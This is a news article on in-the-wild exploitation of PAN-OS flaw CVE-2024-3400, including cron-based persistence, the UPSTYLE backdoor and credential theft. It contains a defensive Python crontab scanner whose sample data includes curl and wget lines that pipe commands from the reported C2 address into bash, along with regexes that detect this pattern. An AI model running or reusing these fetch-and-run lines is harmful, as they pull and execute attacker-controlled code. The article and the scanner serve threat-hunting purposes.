A significant cyber threat has emerged, characterized by the exploitation of a recently uncovered zero-day vulnerability in Palo Alto Networks PAN-OS software. This flaw has been active since March 26, 2024, well before its public disclosure, which occurred yesterday.
Unit 42, a division of Palo Alto Networks, has initiated a tracking operation dubbed Operation MidnightEclipse. This operation is believed to have been carried out by a single threat actor whose origins remain unknown.
The vulnerability, identified as CVE-2024-3400 and assigned a critical CVSS score of 10.0, manifests as a command injection flaw. It allows unauthenticated attackers to execute arbitrary code with root privileges on affected firewall configurations, specifically those using PAN-OS 10.2, 11.0, or 11.1 with GlobalProtect gateway and device telemetry enabled.
The tactics employed in Operation MidnightEclipse include the exploitation of this vulnerability to establish a cron job that executes every minute, fetching commands from an external server (“172.233.228[.]93/policy” or “172.233.228[.]93/patch”) for execution via the bash shell.
Reports indicate that the attackers carefully maintained an access control list (ACL) on the command-and-control (C2) server, restricting access solely to the compromised device communicating with it. The exact content of the commands that were executed, however, remains unknown.
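The persistence mechanism described above (an every-minute cron entry that pulls commands from a remote host and pipes them to bash) can be hunted for in crontab exports collected from firewalls or jump hosts. The scanner below is an added example, not code from the article or from Unit 42 or Volexity; the crontab lines are constructed, and the exact form of the actor's cron command is an assumption.

```python
import re

# Constructed sample crontab export (not taken from a real compromised device).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * /usr/bin/curl -s http://172.233.228.93/policy | /bin/bash
*/1 * * * * wget -qO- http://172.233.228.93/patch | bash
30 2 * * 0 /usr/local/bin/backup.sh
"""

# C2 host named in the report (defanged there as 172.233.228[.]93).
KNOWN_C2 = {"172.233.228.93"}

CRON_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")
# A download tool whose output is piped into a shell interpreter.
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(/bin/)?(ba)?sh\b")
URL_HOST = re.compile(r"https?://([0-9A-Za-z.\-]+)")


def every_minute(fields):
    """True when the five schedule fields fire once a minute ('*' or '*/1')."""
    return fields[0] in ("*", "*/1") and all(f == "*" for f in fields[1:])


def scan_crontab(text):
    """Return suspicious entries; each needs at least two corroborating signals,
    because an every-minute schedule on its own is common in benign crontabs."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        match = CRON_LINE.match(line)
        if not match:
            continue
        fields, command = match.groups()[:5], match.group(6)
        reasons = []
        if every_minute(fields):
            reasons.append("runs every minute")
        if FETCH_TO_SHELL.search(command):
            reasons.append("remote fetch piped to shell")
        if set(URL_HOST.findall(command)) & KNOWN_C2:
            reasons.append("contacts known C2 host")
        if len(reasons) >= 2:
            findings.append({"line": lineno, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_crontab(SAMPLE_CRONTAB):
        print(finding)
```

Run it against `crontab -l` output or the contents of `/etc/cron.d` gathered from hosts under review; extend `KNOWN_C2` with indicators from your own intelligence feeds.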
Further investigation by Volexity has revealed in-the-wild exploitation of CVE-2024-3400 beginning April 10, 2024. They attribute the suspicious URL to a Python-based backdoor named UPSTYLE. This backdoor is believed to be hosted on different servers and is capable of downloading additional malicious tools that enable the threat actor to create a reverse shell and pivot within internal networks, ultimately leading to data exfiltration.
Noteworthy is the method by which the backdoor executes commands and logs their output. The actor repurposes legitimate files belonging to the firewall to carry out these tasks while covering their tracks: the output of each executed command is written temporarily to a file associated with the firewall’s operational logs and then overwritten within a short window, a deliberate effort to remain stealthy.
Volexity has classified the attacking entity as UTA0218, suggesting a potential state-sponsored origin. Their objectives appear to include targeting critical data, such as domain backup DPAPI keys and Active Directory credentials, while also seeking to extract sensitive information from users’ workstations.
Businesses are advised to scrutinize any signs of lateral movement stemming from their Palo Alto Networks GlobalProtect firewall devices, as well as monitor for unauthorized access or changes within their internal networks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalog, mandating that federal agencies apply the relevant patches promptly; Palo Alto Networks is expected to release them by April 14.
The incident serves as a stark reminder that edge devices remain prime targets for advanced threat actors, pointing to the necessity for organizations to bolster their cybersecurity measures and stay vigilant against sophisticated attack techniques outlined in the MITRE ATT&CK framework, particularly in relation to initial access, persistence, and privilege escalation tactics.